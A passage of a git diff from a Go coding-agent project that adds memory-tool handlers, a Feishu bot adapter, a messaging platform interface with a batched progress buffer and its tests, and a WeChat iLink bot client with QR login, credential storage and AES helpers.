+	}
+
+	// Read all
+	content, path, source, err := t.store.Read()
+	if err != nil {
+		return tools.ToolResult{}, err
+	}
+	if content == "" {
+		return tools.NewTextToolResult("No memory file found. Use memory(action=\"add\", section=\"...\", content=\"...\") to create one."), nil
+	}
+
+	header := fmt.Sprintf("[source: %s — %s]\n\n", source, path)
+	return tools.NewTextToolResult(header + content), nil
+}
+
+func (t *MemoryTool) executeAdd(section, content string) (tools.ToolResult, error) {
+	if section == "" {
+		return tools.ToolResult{}, fmt.Errorf("section is required for add action")
+	}
+	if content == "" {
+		return tools.ToolResult{}, fmt.Errorf("content is required for add action")
+	}
+
+	if err := t.store.Add(section, content); err != nil {
+		return tools.ToolResult{}, err
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("Added to '%s': %s", section, content)), nil
+}
+
+func (t *MemoryTool) executeUpdate(section, old, new_ string) (tools.ToolResult, error) {
+	if section == "" {
+		return tools.ToolResult{}, fmt.Errorf("section is required for update action")
+	}
+	if old == "" {
+		return tools.ToolResult{}, fmt.Errorf("old text is required for update action")
+	}
+	if new_ == "" {
+		return tools.ToolResult{}, fmt.Errorf("new text is required for update action")
+	}
+
+	if err := t.store.Update(section, old, new_); err != nil {
+		return tools.ToolResult{}, err
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("Updated in '%s': '%s' → '%s'", section, old, new_)), nil
+}
+
+func (t *MemoryTool) executeDelete(section, content string) (tools.ToolResult, error) {
+	if section == "" {
+		return tools.ToolResult{}, fmt.Errorf("section is required for delete action")
+	}
+	if content == "" {
+		return tools.ToolResult{}, fmt.Errorf("content is required for delete action")
+	}
+
+	if err := t.store.Delete(section, content); err != nil {
+		return tools.ToolResult{}, err
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("Deleted from '%s': %s", section, content)), nil
+}
diff --git a/internal/messaging/feishu/feishu.go b/internal/messaging/feishu/feishu.go
new file mode 100644
index 0000000..8791b51
--- /dev/null
+++ b/internal/messaging/feishu/feishu.go
@@ -0,0 +1,251 @@
+// Package feishu implements the Feishu (Lark) messaging platform adapter.
+// Uses the official Feishu Go SDK with WebSocket long connection for receiving messages.
+package feishu
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"log"
+	"sync"
+
+	lark "github.com/larksuite/oapi-sdk-go/v3"
+	larkcore "github.com/larksuite/oapi-sdk-go/v3/core"
+	"github.com/larksuite/oapi-sdk-go/v3/event/dispatcher"
+	larkim "github.com/larksuite/oapi-sdk-go/v3/service/im/v1"
+	larkws "github.com/larksuite/oapi-sdk-go/v3/ws"
+
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+)
+
+// Bot implements messaging.Platform for Feishu via official SDK WebSocket.
+type Bot struct {
+	appID     string
+	appSecret string
+	client    *lark.Client
+	wsClient  *larkws.Client
+	handler   messaging.MessageHandler
+	connected bool
+	mu        sync.Mutex
+	cancel    context.CancelFunc
+}
+
+// BotOptions configures a Feishu Bot.
+type BotOptions struct {
+	AppID     string
+	AppSecret string
+}
+
+// NewBot creates a new Feishu bot.
+func NewBot(opts BotOptions) *Bot {
+	client := lark.NewClient(opts.AppID, opts.AppSecret)
+	return &Bot{
+		appID:     opts.AppID,
+		appSecret: opts.AppSecret,
+		client:    client,
+	}
+}
+
+// --- messaging.Platform implementation ---
+
+func (b *Bot) Name() string { return "feishu" }
+
+func (b *Bot) IsConnected() bool {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	return b.connected
+}
+
+// Start begins receiving messages via WebSocket long connection.
+func (b *Bot) Start(ctx context.Context, handler messaging.MessageHandler) error {
+	b.mu.Lock()
+	b.handler = handler
+	ctx, cancel := context.WithCancel(ctx)
+	b.cancel = cancel
+	b.mu.Unlock()
+
+	// Create event dispatcher
+	eventDispatcher := dispatcher.NewEventDispatcher("", "").
+		OnP2MessageReceiveV1(b.onMessage)
+
+	// Create WebSocket client
+	b.wsClient = larkws.NewClient(b.appID, b.appSecret,
+		larkws.WithEventHandler(eventDispatcher),
+		larkws.WithLogLevel(larkcore.LogLevelInfo),
+	)
+
+	b.mu.Lock()
+	b.connected = true
+	b.mu.Unlock()
+
+	log.Printf("[feishu] WebSocket long connection started")
+
+	// Start blocks until connection drops or context cancelled
+	err := b.wsClient.Start(ctx)
+
+	b.mu.Lock()
+	b.connected = false
+	b.mu.Unlock()
+
+	if ctx.Err() != nil {
+		return nil // normal shutdown
+	}
+	return err
+}
+
+// Stop gracefully shuts down the bot.
+func (b *Bot) Stop() error {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	if b.cancel != nil {
+		b.cancel()
+	}
+	b.connected = false
+	return nil
+}
+
+// SendMessage sends a text message to a chat.
+func (b *Bot) SendMessage(ctx context.Context, chatID string, text string) error {
+	content, _ := json.Marshal(map[string]string{"text": text})
+	req := larkim.NewCreateMessageReqBuilder().
+		ReceiveIdType("chat_id").
+		Body(larkim.NewCreateMessageReqBodyBuilder().
+			ReceiveId(chatID).
+			MsgType("text").
+			Content(string(content)).
+			Build()).
+		Build()
+
+	resp, err := b.client.Im.Message.Create(ctx, req)
+	if err != nil {
+		return fmt.Errorf("feishu send message: %w", err)
+	}
+	if !resp.Success() {
+		return fmt.Errorf("feishu send message: code=%d msg=%s", resp.Code, resp.Msg)
+	}
+	return nil
+}
+
+// --- Event handler ---
+
+func (b *Bot) onMessage(ctx context.Context, event *larkim.P2MessageReceiveV1) error {
+	b.mu.Lock()
+	handler := b.handler
+	b.mu.Unlock()
+
+	if handler == nil {
+		return nil
+	}
+
+	msg := event.Event.Message
+	sender := event.Event.Sender
+
+	// Only handle text messages
+	if msg == nil || sender == nil {
+		return nil
+	}
+
+	msgType := ""
+	if msg.MessageType != nil {
+		msgType = *msg.MessageType
+	}
+	if msgType != "text" {
+		log.Printf("[feishu] Ignoring non-text message type: %s", msgType)
+		return nil
+	}
+
+	// Parse text content
+	var textContent struct {
+		Text string `json:"text"`
+	}
+	if msg.Content != nil {
+		json.Unmarshal([]byte(*msg.Content), &textContent)
+	}
+	if textContent.Text == "" {
+		return nil
+	}
+
+	// Extract user info
+	userID := ""
+	if sender.SenderId != nil && sender.SenderId.OpenId != nil {
+		userID = *sender.SenderId.OpenId
+	}
+
+	chatID := ""
+	if msg.ChatId != nil {
+		chatID = *msg.ChatId
+	}
+
+	inbound := messaging.InboundMessage{
+		Platform: "feishu",
+		ChatID:   chatID,
+		UserID:   userID,
+		Text:     textContent.Text,
+	}
+
+	// Handle message asynchronously
+	go func() {
+		// Create progress buffer: max 7 progress lines per batch, reserve 3 for summary
+		progressBuf := messaging.NewProgressBuffer(7, func(text string) {
+			if err := b.SendMessage(context.Background(), chatID, text); err != nil {
+				log.Printf("[feishu] Progress send error: %v", err)
+			}
+		})
+		inbound.ProgressFunc = func(text string) {
+			progressBuf.Add(text)
+		}
+
+		response, err := handler(context.Background(), inbound)
+
+		// Flush remaining progress lines before final summary
+		progressBuf.Flush()
+
+		if err != nil {
+			log.Printf("[feishu] Handler error for %s: %v", userID, err)
+			response = "⚠️ Error: " + err.Error()
+		}
+		if response != "" {
+			// Reply in the same chat
+			replyID := ""
+			if msg.MessageId != nil {
+				replyID = *msg.MessageId
+			}
+			if replyErr := b.replyMessage(context.Background(), replyID, chatID, response); replyErr != nil {
+				log.Printf("[feishu] Reply error: %v", replyErr)
+			}
+		}
+	}()
+
+	return nil
+}
+
+// replyMessage replies to a message or sends to chat.
+func (b *Bot) replyMessage(ctx context.Context, messageID, chatID, text string) error {
+	content, _ := json.Marshal(map[string]string{"text": text})
+
+	if messageID != "" {
+		// Reply to specific message
+		req := larkim.NewReplyMessageReqBuilder().
+			MessageId(messageID).
+			Body(larkim.NewReplyMessageReqBodyBuilder().
+				MsgType("text").
+				Content(string(content)).
+				Build()).
+			Build()
+
+		resp, err := b.client.Im.Message.Reply(ctx, req)
+		if err != nil {
+			return err
+		}
+		if !resp.Success() {
+			return fmt.Errorf("code=%d msg=%s", resp.Code, resp.Msg)
+		}
+		return nil
+	}
+
+	// Send to chat directly
+	return b.SendMessage(ctx, chatID, text)
+}
+
+// Ensure Bot implements messaging.Platform at compile time.
+var _ messaging.Platform = (*Bot)(nil)
diff --git a/internal/messaging/platform.go b/internal/messaging/platform.go
new file mode 100644
index 0000000..1cb85ee
--- /dev/null
+++ b/internal/messaging/platform.go
@@ -0,0 +1,40 @@
+// Package messaging defines the messaging platform abstraction for Hermes mode.
+// Each platform (WeChat, Feishu, etc.) implements the Platform interface.
+package messaging
+
+import (
+	"context"
+	"time"
+)
+
+// Platform defines the interface that all messaging platform adapters must implement.
+type Platform interface {
+	// Name returns the platform identifier (e.g. "wechat", "feishu").
+	Name() string
+	// Start begins receiving messages. Blocks until ctx is cancelled or Stop is called.
+	Start(ctx context.Context, handler MessageHandler) error
+	// Stop gracefully shuts down the platform connection.
+	Stop() error
+	// SendMessage sends a text message to a specific chat.
+	SendMessage(ctx context.Context, chatID string, text string) error
+	// IsConnected reports whether the platform is currently connected.
+	IsConnected() bool
+}
+
+// MessageHandler is called for each incoming message.
+// It returns the response text to send back to the user.
+type MessageHandler func(ctx context.Context, msg InboundMessage) (string, error)
+
+// InboundMessage represents a message received from a messaging platform.
+type InboundMessage struct {
+	Platform  string    // "wechat", "feishu", etc.
+	ChatID    string    // Conversation/chat identifier
+	UserID    string    // Sender user ID
+	UserName  string    // Sender display name
+	Text      string    // Message text content
+	Timestamp time.Time // When the message was sent
+
+	// ProgressFunc is called to send intermediate progress updates during agent execution.
+	// If nil, no progress updates are sent.
+	ProgressFunc func(text string)
+}
diff --git a/internal/messaging/progress.go b/internal/messaging/progress.go
new file mode 100644
index 0000000..042ad24
--- /dev/null
+++ b/internal/messaging/progress.go
@@ -0,0 +1,73 @@
+package messaging
+
+import (
+	"strings"
+	"sync"
+)
+
+// ProgressBuffer collects progress lines and flushes them in batches.
+// Designed for messaging platforms with per-message reply limits (e.g., WeChat: 10 replies per user message).
+//
+// Usage:
+//
+//	buf := NewProgressBuffer(maxLines, sendFunc)
+//	// During agent execution:
+//	buf.Add("[read]: file.go ✅")   // buffered
+//	buf.Add("[bash]: go build ✅")  // buffered, auto-flushes if full
+//	// After agent completes:
+//	buf.Flush()                      // send remaining lines
+type ProgressBuffer struct {
+	mu       sync.Mutex
+	lines    []string
+	maxLines int         // max lines before auto-flush
+	reserve  int         // lines reserved for final summary (not counted in maxLines)
+	sendFunc func(string) // combined send function
+	total    int         // total lines added (for logging)
+}
+
+// NewProgressBuffer creates a progress buffer.
+//
+//	maxLines: max progress lines to collect before auto-flushing (e.g., 7)
+//	reserve: lines reserved for final summary, subtracted from platform limit (e.g., 3)
+//	sendFunc: function to send combined text (e.g., WeChat SendMessage)
+func NewProgressBuffer(maxLines int, sendFunc func(string)) *ProgressBuffer {
+	if maxLines <= 0 {
+		maxLines = 7
+	}
+	return &ProgressBuffer{
+		lines:    make([]string, 0, maxLines),
+		maxLines: maxLines,
+		reserve:  3,
+		sendFunc: sendFunc,
+	}
+}
+
+// Add adds a progress line. Auto-flushes when buffer is full.
+func (b *ProgressBuffer) Add(line string) {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+
+	b.lines = append(b.lines, line)
+	b.total++
+
+	if len(b.lines) >= b.maxLines {
+		b.flushLocked()
+	}
+}
+
+// Flush sends any remaining buffered lines. Call after agent completes.
+func (b *ProgressBuffer) Flush() {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	b.flushLocked()
+}
+
+// flushLocked sends buffered lines and clears the buffer. Must hold b.mu.
+func (b *ProgressBuffer) flushLocked() {
+	if len(b.lines) == 0 || b.sendFunc == nil {
+		return
+	}
+	combined := strings.Join(b.lines, "\n")
+	b.sendFunc(combined)
+	b.lines = b.lines[:0]
+}
diff --git a/internal/messaging/progress_test.go b/internal/messaging/progress_test.go
new file mode 100644
index 0000000..88e8545
--- /dev/null
+++ b/internal/messaging/progress_test.go
@@ -0,0 +1,88 @@
+package messaging
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestProgressBufferBasic(t *testing.T) {
+	var sent []string
+	buf := NewProgressBuffer(7, func(text string) {
+		sent = append(sent, text)
+	})
+
+	buf.Add("line1")
+	buf.Add("line2")
+	buf.Flush()
+
+	if len(sent) != 1 {
+		t.Fatalf("expected 1 flush, got %d", len(sent))
+	}
+	if !strings.Contains(sent[0], "line1") || !strings.Contains(sent[0], "line2") {
+		t.Errorf("unexpected flush content: %s", sent[0])
+	}
+}
+
+func TestProgressBufferAutoFlush(t *testing.T) {
+	var sent []string
+	buf := NewProgressBuffer(3, func(text string) {
+		sent = append(sent, text)
+	})
+
+	buf.Add("a")
+	buf.Add("b")
+	buf.Add("c") // should trigger auto-flush
+
+	if len(sent) != 1 {
+		t.Fatalf("expected 1 auto-flush, got %d", len(sent))
+	}
+	if !strings.Contains(sent[0], "a") || !strings.Contains(sent[0], "c") {
+		t.Errorf("unexpected auto-flush content: %s", sent[0])
+	}
+
+	// Buffer should be empty now
+	buf.Flush()
+	if len(sent) != 1 {
+		t.Errorf("expected no additional flush, got %d total", len(sent)-1)
+	}
+}
+
+func TestProgressBufferMultipleFlushes(t *testing.T) {
+	var sent []string
+	buf := NewProgressBuffer(2, func(text string) {
+		sent = append(sent, text)
+	})
+
+	buf.Add("1")
+	buf.Add("2") // auto-flush
+	buf.Add("3")
+	buf.Flush() // manual flush
+
+	if len(sent) != 2 {
+		t.Fatalf("expected 2 flushes, got %d", len(sent))
+	}
+	if !strings.Contains(sent[0], "1") || !strings.Contains(sent[0], "2") {
+		t.Errorf("first flush: %s", sent[0])
+	}
+	if !strings.Contains(sent[1], "3") {
+		t.Errorf("second flush: %s", sent[1])
+	}
+}
+
+func TestProgressBufferEmpty(t *testing.T) {
+	called := false
+	buf := NewProgressBuffer(7, func(text string) {
+		called = true
+	})
+
+	buf.Flush()
+	if called {
+		t.Error("flush on empty buffer should not call sendFunc")
+	}
+}
+
+func TestProgressBufferNilSendFunc(t *testing.T) {
+	buf := NewProgressBuffer(7, nil)
+	buf.Add("test")
+	buf.Flush() // should not panic
+}
diff --git a/internal/messaging/wechat/auth.go b/internal/messaging/wechat/auth.go
new file mode 100644
index 0000000..1227ac3
--- /dev/null
+++ b/internal/messaging/wechat/auth.go
@@ -0,0 +1,156 @@
+package wechat
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"time"
+)
+
+const (
+	maxQRRefreshCount = 3
+	fixedQRBaseURL    = "https://ilinkai.weixin.qq.com"
+)
+
+// LoadCredentials loads stored credentials from disk.
+func LoadCredentials(path string) (*Credentials, error) {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil, nil
+		}
+		return nil, err
+	}
+	var creds Credentials
+	if err := json.Unmarshal(data, &creds); err != nil {
+		return nil, err
+	}
+	return &creds, nil
+}
+
+// SaveCredentials persists credentials to disk.
+func SaveCredentials(creds *Credentials, path string) error {
+	dir := filepath.Dir(path)
+	if err := os.MkdirAll(dir, 0700); err != nil {
+		return err
+	}
+	data, _ := json.MarshalIndent(creds, "", "  ")
+	return os.WriteFile(path, append(data, '\n'), 0600)
+}
+
+// ClearCredentials removes stored credentials.
+func ClearCredentials(path string) error {
+	return os.Remove(path)
+}
+
+// LoginOptions configures the login flow.
+type LoginOptions struct {
+	BaseURL   string
+	CredPath  string
+	Force     bool
+	OnQRURL   func(url string)
+	OnScanned func()
+	OnExpired func()
+}
+
+// Login performs QR code login, returning credentials.
+// If stored credentials exist and Force is false, returns them directly.
+func Login(ctx context.Context, client *Client, opts LoginOptions) (*Credentials, error) {
+	baseURL := opts.BaseURL
+	if baseURL == "" {
+		baseURL = DefaultBaseURL
+	}
+
+	if !opts.Force {
+		creds, err := LoadCredentials(opts.CredPath)
+		if err == nil && creds != nil {
+			return creds, nil
+		}
+	}
+
+	qrRefreshCount := 0
+	for {
+		qrRefreshCount++
+		if qrRefreshCount > maxQRRefreshCount {
+			return nil, fmt.Errorf("QR code expired %d times — login aborted", maxQRRefreshCount)
+		}
+
+		qr, err := client.GetQRCode(ctx, fixedQRBaseURL)
+		if err != nil {
+			return nil, fmt.Errorf("get QR code: %w", err)
+		}
+
+		if opts.OnQRURL != nil {
+			opts.OnQRURL(qr.QRCodeImgURL)
+		} else {
+			fmt.Fprintf(os.Stderr, "Scan this URL in WeChat: %s\n", qr.QRCodeImgURL)
+		}
+
+		lastStatus := ""
+		currentPollBaseURL := fixedQRBaseURL
+		for {
+			status, err := client.PollQRStatus(ctx, currentPollBaseURL, qr.QRCode)
+			if err != nil {
+				return nil, fmt.Errorf("poll QR status: %w", err)
+			}
+
+			if status.Status != lastStatus {
+				lastStatus = status.Status
+				switch status.Status {
+				case "scaned":
+					if opts.OnScanned != nil {
+						opts.OnScanned()
+					} else {
+						fmt.Fprintln(os.Stderr, "QR scanned — confirm in WeChat")
+					}
+				case "expired":
+					if opts.OnExpired != nil {
+						opts.OnExpired()
+					} else {
+						fmt.Fprintln(os.Stderr, "QR expired — requesting new one")
+					}
+				case "confirmed":
+					fmt.Fprintln(os.Stderr, "Login confirmed")
+				}
+			}
+
+			if status.Status == "confirmed" {
+				if status.BotToken == "" || status.BotID == "" || status.UserID == "" {
+					return nil, fmt.Errorf("login confirmed but missing credentials")
+				}
+				resolvedBase := baseURL
+				if status.BaseURL != "" {
+					resolvedBase = status.BaseURL
+				}
+				creds := &Credentials{
+					Token:     status.BotToken,
+					BaseURL:   resolvedBase,
+					AccountID: status.BotID,
+					UserID:    status.UserID,
+					SavedAt:   time.Now().UTC().Format(time.RFC3339),
+				}
+				if err := SaveCredentials(creds, opts.CredPath); err != nil {
+					fmt.Fprintf(os.Stderr, "Warning: could not save credentials: %v\n", err)
+				}
+				return creds, nil
+			}
+
+			if status.Status == "scaned_but_redirect" {
+				if status.RedirectHost != "" {
+					currentPollBaseURL = "https://" + status.RedirectHost
+					fmt.Fprintf(os.Stderr, "IDC redirect → %s\n", status.RedirectHost)
+				}
+				time.Sleep(2 * time.Second)
+				continue
+			}
+
+			if status.Status == "expired" {
+				break
+			}
+
+			time.Sleep(2 * time.Second)
+		}
+	}
+}
diff --git a/internal/messaging/wechat/crypto.go b/internal/messaging/wechat/crypto.go
new file mode 100644
index 0000000..7ea72a2
--- /dev/null
+++ b/internal/messaging/wechat/crypto.go
@@ -0,0 +1,107 @@
+package wechat
+
+import (
+	"crypto/aes"
+	"crypto/rand"
+	"encoding/base64"
+	"encoding/hex"
+	"fmt"
+	"regexp"
+)
+
+var hexPattern = regexp.MustCompile(`^[0-9a-fA-F]{32}$`)
+
+// EncryptAESECB encrypts plaintext with AES-128-ECB and PKCS7 padding.
+func EncryptAESECB(plaintext, key []byte) ([]byte, error) {
+	if len(key) != 16 {
+		return nil, fmt.Errorf("AES key must be 16 bytes, got %d", len(key))
+	}
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		return nil, err
+	}
+	padded := pkcs7Pad(plaintext, aes.BlockSize)
+	ciphertext := make([]byte, len(padded))
+	for i := 0; i < len(padded); i += aes.BlockSize {
+		block.Encrypt(ciphertext[i:i+aes.BlockSize], padded[i:i+aes.BlockSize])
+	}
+	return ciphertext, nil
+}
+
+// DecryptAESECB decrypts AES-128-ECB ciphertext and removes PKCS7 padding.
+func DecryptAESECB(ciphertext, key []byte) ([]byte, error) {
+	if len(key) != 16 {
+		return nil, fmt.Errorf("AES key must be 16 bytes, got %d", len(key))
+	}
+	if len(ciphertext)%aes.BlockSize != 0 {
+		return nil, fmt.Errorf("ciphertext length %d is not a multiple of block size", len(ciphertext))
+	}
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		return nil, err
+	}
+	plaintext := make([]byte, len(ciphertext))
+	for i := 0; i < len(ciphertext); i += aes.BlockSize {
+		block.Decrypt(plaintext[i:i+aes.BlockSize], ciphertext[i:i+aes.BlockSize])
+	}
+	return pkcs7Unpad(plaintext)
+}
+
+// GenerateAESKey generates a random 16-byte AES key.
+func GenerateAESKey() ([]byte, error) {
+	key := make([]byte, 16)
+	_, err := rand.Read(key)
+	return key, err
+}
+
+// DecodeAESKey decodes an aes_key from the protocol.
+// Handles: direct hex (32 chars), base64(raw 16 bytes), base64(hex string 32 chars).
+func DecodeAESKey(encoded string) ([]byte, error) {
+	if hexPattern.MatchString(encoded) {
+		return hex.DecodeString(encoded)
+	}
+	decoded, err := base64.StdEncoding.DecodeString(encoded)
+	if err != nil {
+		decoded, err = base64.URLEncoding.DecodeString(encoded)
+		if err != nil {
+			return nil, fmt.Errorf("cannot base64 decode aes_key: %w", err)
+		}
+	}
+	if len(decoded) == 16 {
+		return decoded, nil
+	}
+	if len(decoded) == 32 && hexPattern.Match(decoded) {
+		return hex.DecodeString(string(decoded))
+	}
+	return nil, fmt.Errorf("decoded aes_key has unexpected length %d (want 16 or 32)", len(decoded))
+}
+
+// EncodeAESKeyHex returns the hex string of a key.
+func EncodeAESKeyHex(key []byte) string {
+	return hex.EncodeToString(key)
+}
+
+// EncodeAESKeyBase64 returns base64(hex) for CDNMedia.aes_key.
+func EncodeAESKeyBase64(key []byte) string {
+	return base64.StdEncoding.EncodeToString([]byte(hex.EncodeToString(key)))
+}
+
+func pkcs7Pad(data []byte, blockSize int) []byte {
+	padding := blockSize - len(data)%blockSize
+	pad := make([]byte, padding)
+	for i := range pad {
+		pad[i] = byte(padding)
+	}
+	return append(data, pad...)
+}
+
+func pkcs7Unpad(data []byte) ([]byte, error) {
+	if len(data) == 0 {
+		return nil, fmt.Errorf("empty data")
+	}
+	padding := int(data[len(data)-1])
+	if padding > len(data) || padding == 0 {
+		return nil, fmt.Errorf("invalid PKCS7 padding")
+	}
+	return data[:len(data)-padding], nil
+}
diff --git a/internal/messaging/wechat/protocol.go b/internal/messaging/wechat/protocol.go
new file mode 100644
index 0000000..61d12de
--- /dev/null
+++ b/internal/messaging/wechat/protocol.go
@@ -0,0 +1,227 @@
+package wechat
+
+import (
+	"bytes"
+	"context"
+	"crypto/rand"
+	"encoding/base64"
+	"encoding/binary"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"net/url"
+	"strconv"
+	"time"
+)
+
+const (
+	DefaultBaseURL = "https://ilinkai.weixin.qq.com"
+	CDNBaseURL     = "https://novac2c.cdn.weixin.qq.com/c2c"
+	ChannelVersion = "0.1.0"
+	iLinkAppID     = "bot"
+	iLinkClientVer = "256"
+
+	maxAPIResponseBytes = 1 << 20
+)
+
+// Client wraps HTTP calls to the iLink API.
+type Client struct {
+	HTTP *http.Client
+}
+
+// NewClient creates a protocol client.
+func NewClient() *Client {
+	return &Client{
+		HTTP: &http.Client{Timeout: 45 * time.Second},
+	}
+}
+
+// CommonHeaders returns headers for iLink API requests.
+func CommonHeaders() http.Header {
+	h := http.Header{}
+	h.Set("iLink-App-Id", iLinkAppID)
+	h.Set("iLink-App-ClientVersion", iLinkClientVer)
+	return h
+}
+
+// AuthHeaders returns the standard iLink POST headers.
+func AuthHeaders(token string) http.Header {
+	h := CommonHeaders()
+	h.Set("Content-Type", "application/json")
+	h.Set("AuthorizationType", "ilink_bot_token")
+	h.Set("Authorization", "Bearer "+token)
+	h.Set("X-WECHAT-UIN", randomWechatUIN())
+	return h
+}
+
+func randomWechatUIN() string {
+	var buf [4]byte
+	rand.Read(buf[:])
+	val := binary.BigEndian.Uint32(buf[:])
+	return base64.StdEncoding.EncodeToString([]byte(strconv.FormatUint(uint64(val), 10)))
+}
+
+func baseInfo() map[string]string {
+	return map[string]string{"channel_version": ChannelVersion}
+}
+
+// GetQRCode requests a new QR code for login.
+func (c *Client) GetQRCode(ctx context.Context, baseURL string) (*QRCodeResponse, error) {
+	u := baseURL + "/ilink/bot/get_bot_qrcode?bot_type=3"
+	req, _ := http.NewRequestWithContext(ctx, "GET", u, nil)
+	for k, v := range CommonHeaders() {
+		req.Header[k] = v
+	}
+	resp, err := c.HTTP.Do(req)
+	if err != nil {
+		return nil, fmt.Errorf("get_bot_qrcode: %w", err)
+	}
+	defer resp.Body.Close()
+	var result QRCodeResponse
+	if err := json.NewDecoder(resp.Body).Decode(&result); err != nil {
+		return nil, fmt.Errorf("get_bot_qrcode decode: %w", err)
+	}
+	return &result, nil
+}
+
+// PollQRStatus polls the QR code scan status.
+func (c *Client) PollQRStatus(ctx context.Context, baseURL, qrcode string) (*QRStatusResponse, error) {
+	u := baseURL + "/ilink/bot/get_qrcode_status?qrcode=" + url.QueryEscape(qrcode)
+	req, _ := http.NewRequestWithContext(ctx, "GET", u, nil)
+	for k, v := range CommonHeaders() {
+		req.Header[k] = v
+	}
+	resp, err := c.HTTP.Do(req)
+	if err != nil {
+		return nil, err
+	}
+	defer resp.Body.Close()
+	var result QRStatusResponse
+	json.NewDecoder(resp.Body).Decode(&result)
+	return &result, nil
+}
+
+// apiPost sends a POST to the iLink API and parses the response.
+func (c *Client) apiPost(ctx context.Context, baseURL, endpoint, token string, body interface{}, timeout time.Duration) (json.RawMessage, error) {
+	data, _ := json.Marshal(body)
+	u := baseURL + endpoint
+	httpCtx, cancel := context.WithTimeout(ctx, timeout)
+	defer cancel()
+
+	req, _ := http.NewRequestWithContext(httpCtx, "POST", u, bytes.NewReader(data))
+	for k, v := range AuthHeaders(token) {
+		req.Header[k] = v
+	}
+
+	resp, err := c.HTTP.Do(req)
+	if err != nil {
+		return nil, fmt.Errorf("%s: %w", endpoint, err)
+	}
+	defer resp.Body.Close()
+
+	raw, err := io.ReadAll(io.LimitReader(resp.Body, maxAPIResponseBytes))
+	if err != nil {
+		return nil, fmt.Errorf("%s: read response: %w", endpoint, err)
+	}
+	if resp.StatusCode >= 400 {
+		return nil, &APIError{Message: string(raw), HTTPStatus: resp.StatusCode}
+	}
+
+	var check struct {
+		Ret     int    `json:"ret"`
+		ErrCode int    `json:"errcode"`
+		ErrMsg  string `json:"errmsg"`
+	}
+	json.Unmarshal(raw, &check)
+	if check.Ret != 0 || check.ErrCode != 0 {
+		code := check.ErrCode
+		if code == 0 {
+			code = check.Ret
+		}
+		msg := check.ErrMsg
+		if msg == "" {
+			msg = fmt.Sprintf("ret=%d", check.Ret)
+		}
+		return nil, &APIError{Message: msg, HTTPStatus: resp.StatusCode, ErrCode: code}
+	}
+
+	return json.RawMessage(raw), nil
+}
+
+// GetUpdates performs a long-poll for new messages.
+func (c *Client) GetUpdates(ctx context.Context, baseURL, token, cursor string) (*GetUpdatesResponse, error) {
+	body := map[string]interface{}{
+		"get_updates_buf": cursor,
+		"base_info":       baseInfo(),
+	}
+	raw, err := c.apiPost(ctx, baseURL, "/ilink/bot/getupdates", token, body, 45*time.Second)
+	if err != nil {
+		return nil, err
+	}
+	var result GetUpdatesResponse
+	json.Unmarshal(raw, &result)
+	return &result, nil
+}
+
+// SendMessage sends a message through the iLink API.
+func (c *Client) SendMessage(ctx context.Context, baseURL, token string, msg interface{}) error {
+	body := map[string]interface{}{
+		"msg":       msg,
+		"base_info": baseInfo(),
+	}
+	_, err := c.apiPost(ctx, baseURL, "/ilink/bot/sendmessage", token, body, 15*time.Second)
+	return err
+}
+
+// GetConfig gets the typing ticket for a user.
+func (c *Client) GetConfig(ctx context.Context, baseURL, token, userID, contextToken string) (*GetConfigResponse, error) {
+	body := map[string]interface{}{
+		"ilink_user_id": userID,
+		"context_token": contextToken,
+		"base_info":     baseInfo(),
+	}
+	raw, err := c.apiPost(ctx, baseURL, "/ilink/bot/getconfig", token, body, 15*time.Second)
+	if err != nil {
+		return nil, err
+	}
+	var result GetConfigResponse
+	json.Unmarshal(raw, &result)
+	return &result, nil
+}
+
+// SendTyping sends or cancels the typing indicator.
+func (c *Client) SendTyping(ctx context.Context, baseURL, token, userID, ticket string, status int) error {
+	body := map[string]interface{}{
+		"ilink_user_id": userID,
+		"typing_ticket": ticket,
+		"status":        status,
+		"base_info":     baseInfo(),
+	}
+	_, err := c.apiPost(ctx, baseURL, "/ilink/bot/sendtyping", token, body, 15*time.Second)
+	return err
+}
+
+// BuildTextMessage creates a text message payload.
+func BuildTextMessage(fromUserID, toUserID, contextToken, text string) map[string]interface{} {
+	return map[string]interface{}{
+		"from_user_id":  fromUserID,
+		"to_user_id":    toUserID,
+		"client_id":     newUUID(),
+		"message_type":  2,
+		"message_state": 2,
+		"context_token": contextToken,
+		"item_list": []map[string]interface{}{
+			{"type": 1, "text_item": map[string]string{"text": text}},
+		},
+	}
+}
+
+func newUUID() string {
+	var buf [16]byte
+	rand.Read(buf[:])
+	buf[6] = (buf[6] & 0x0f) | 0x40
+	buf[8] = (buf[8] & 0x3f) | 0x80
+	return fmt.Sprintf("%08x-%04x-%04x-%04x-%012x",
+		buf[0:4], buf[4:6], buf[6:8], buf[8:10], buf[10:16])
+}
diff --git a/internal/messaging/wechat/types.go b/internal/messaging/wechat/types.go
new file mode 100644
index 0000000..e97aefa
--- /dev/null
+++ b/internal/messaging/wechat/types.go
@@ -0,0 +1,122 @@
+// Package wechat implements the WeChat iLink Bot messaging platform adapter.
+// Protocol implementation is based on the iLink Bot API specification.
+// Zero external dependencies — uses only Go standard library.
+package wechat
+
+import (
+	"encoding/json"
+	"fmt"
+	"time"
+)
+
+// --- Message types from iLink protocol ---
+
+// MessageType indicates who sent the message.
+type MessageType int
+
+const (
+	MessageTypeUser MessageType = 1
+	MessageTypeBot  MessageType = 2
+)
+
+// MessageItemType indicates the content type.
+type MessageItemType int
+
+const (
+	ItemText  MessageItemType = 1
+	ItemImage MessageItemType = 2
+	ItemVoice MessageItemType = 3
+	ItemFile  MessageItemType = 4
+	ItemVideo MessageItemType = 5
+)
+
+// --- Wire types (raw JSON from iLink API) ---
+
+// WireMessage is the raw message from the iLink API.
+type WireMessage struct {
+	Seq          int64         `json:"seq,omitempty"`
+	MessageID    int64         `json:"message_id,omitempty"`
